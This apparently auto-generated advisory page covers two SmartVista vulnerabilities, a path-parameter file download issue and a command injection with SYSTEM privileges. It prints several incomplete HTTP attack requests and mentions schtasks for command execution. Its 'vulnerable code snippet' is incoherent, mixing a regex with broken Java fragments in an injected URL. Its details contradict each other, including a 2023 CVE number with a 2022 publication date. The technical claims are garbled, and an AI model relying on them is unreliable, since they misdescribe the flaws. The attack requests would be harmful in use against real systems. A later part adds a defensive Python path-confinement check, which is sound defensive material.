CVE-2022-38614 IGB Files and OutfileService has an issue where attackers can list and download files by modifying the PATH parameter.
The vulnerability exists due to the Ingesting Service exposing a user-controlled Path variable to the application. An attacker can leverage this to append arbitrary file names to the PATH variable, allowing the creation of arbitrary file downloads. By creating a backdoor file in the c:\Windows\System32\ directory, an attacker can cause the SmartVista Ingesting Service to bypass the PATH variable, resulting in the download of any file on the system. The following example shows the injection of a backdoor file in the Path variable via a malicious VCF import request.
POST /IngestingService/v3/ImportVCF HTTP/1.1
Host: smartvistacardgen.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8,application/signed-exchange;v=b;f=11;t=11;w=11;sz=0
Referer: http://smartvistacardgen.com/V3/InjectReferer.aspx
Accept-Encoding: gzip, deflate, sdch, sdch
X-Requested-With
Path Variable Injection - An example
The following example is a malicious VCF import request that adds the backdoor file to the Path variable.
POST /IngestingService/v3/ImportVCF HTTP/1.1
Host: smartvistacardgen.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8,application/signed-exchange;v=b;f=11;t=11;w=11;sz=0
Referer: http://smartvistacardgen.com
Accept-Encoding: gzip, deflate, sdch
X-Requested-With
Vulnerable code snippet
Mozilla\/5\.0 \(Windows\_NT\_6\.1\)/WOW64 \(AppleWebKit\/537\.36\) ~~LionsGate~~Chrome 41 \^.*?\:\s(.*)
GET /IngestingService/"&Path%20%3D%20c%27$%7BStringBuilder sb = new StringBuilder(); sb .append("c:");
sb .append("Name=");
sb .append(""); """ .append
CVSS Scores
CVSS Base Score: 6.8
CVSS Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploitability Index: 7.1
The vulnerability can be exploited via malformed VCF import requests to inject a backdoor file in the system.
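On the defensive side, a file-serving endpoint that takes a Path value from the request should resolve it against a fixed root and refuse anything that lands outside it. The check below is an added example, not code from the page or the vendor; ALLOWED_ROOT and resolve_confined are hypothetical names, and the root directory is a constructed placeholder because the page does not say where the service stores its files.

```python
import ntpath  # Windows path rules, usable on any OS for a lexical check

# Assumption: the page does not name the directory the service serves files from.
ALLOWED_ROOT = r"C:\SmartVista\outfiles"  # constructed placeholder


def resolve_confined(user_path, root=ALLOWED_ROOT):
    """Return the normalised path under root, or None if the request escapes it."""
    if not user_path or "\x00" in user_path:
        return None
    drive, rest = ntpath.splitdrive(user_path)
    # Only relative names are accepted: no drive letter, UNC share or rooted path.
    if drive or rest.startswith(("\\", "/")):
        return None
    # A remaining ':' means an alternate data stream such as "out.csv::$DATA".
    if ":" in rest:
        return None
    # Win32 path handling drops trailing dots and spaces, so ".. " can alias "..".
    for part in rest.replace("/", "\\").split("\\"):
        if part not in ("", ".", "..") and part[-1] in ". ":
            return None
    candidate = ntpath.normpath(ntpath.join(root, rest))
    root_cmp = ntpath.normcase(ntpath.normpath(root))
    # Compare with a trailing separator so "outfiles_old" does not match "outfiles".
    if not ntpath.normcase(candidate).startswith(root_cmp + "\\"):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample values for the Path parameter.
    for sample in (r"reports\2022\out.csv", r"..\..\Windows\win.ini",
                   r"c:\Windows\System32\drivers\etc\hosts", "out.csv::$DATA"):
        print(repr(sample), "->", resolve_confined(sample))
```

The check is lexical only; on the real host, resolve junctions and symbolic links (for example with os.path.realpath) before the prefix comparison.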
CVE-2023-38615
The vulnerability exists due to the SmartVista Image Service not performing sufficient input validation. An attacker can leverage this to inject shell commands as part of an HTTP request, resulting in the execution of arbitrary command lines with SYSTEM privileges. This allows an attacker to gain total control over the system by creating a malicious WMI image that executes commands such as “schtasks /create /S”, which creates a task for every process running on the system.
POST /ImageService/v3/GetImage HTTP/1.1
Host: smartvistacardgen.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Accept-Encoding: gzip, deflate, sdch, sdch
X-Requested-With: XMLHttpRequest
Referer: http://smartvistacardgen.com/imgsvc?type=wmi&svc=3
Content-Type: application/x-www-form-urlencoded
Accept-Language: en_US
x-mswfdn: wfqybkbk8j8
Timeline
Published on: 09/09/2022 17:15:00 UTC
Last modified on: 09/14/2022 20:15:00 UTC